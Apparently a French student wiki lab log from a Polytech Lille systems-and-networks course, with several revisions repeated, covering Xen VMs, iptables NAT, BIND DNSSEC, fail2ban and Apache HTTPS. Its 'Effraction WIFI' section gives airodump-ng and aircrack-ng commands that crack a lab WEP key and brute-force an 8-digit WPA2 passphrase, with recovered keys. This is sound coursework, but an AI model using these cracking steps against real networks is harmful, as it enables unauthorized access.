file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-10T16:05:32Z

Abiernac :

=== Projet de virtualisation ===

==== Atelier système et réseau, les machines virtuelles ====

===== Création des machines virtuelles =====
Nous avons créé deux machines avec les commandes suivantes :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight><syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight><syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight><syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]

</syntaxhighlight>modif le fichier <code>/etc/fstab</code> :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>sur terminal<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
</syntaxhighlight>ensuite : <syntaxhighlight>
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight><syntaxhighlight lang="bash">
auto eth0
iface eth0 inet static
address 172.10.0.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Enfin on peut lancer la méthode par force brute via la commande suivante<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>Le résutat peut-être observé via la commande :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight><syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1

C9200-E304>en

C9200-E304>configure

C9200-E304(config)#ip dhcp pool PoolAntonin

C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0

C9200-E304(dhcp-config)#dns-server 193.48.57.169

C9200-E304(dhcp-config)#default-router 10.60.14.254

C9200-E304#show running-config

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-10T15:48:53Z

Abiernac :

=== Projet de virtualisation ===

==== Atelier système et réseau, les machines virtuelles ====

===== Création des machines virtuelles =====
Nous avons créé deux machines avec les commandes suivantes :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight><syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight><syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight><syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]

</syntaxhighlight>modif le fichier <code>/etc/fstab</code> :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>sur terminal<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
</syntaxhighlight>ensuite : <syntaxhighlight>
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight><syntaxhighlight lang="bash">
auto eth0
iface eth0 inet static
address 172.10.0.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
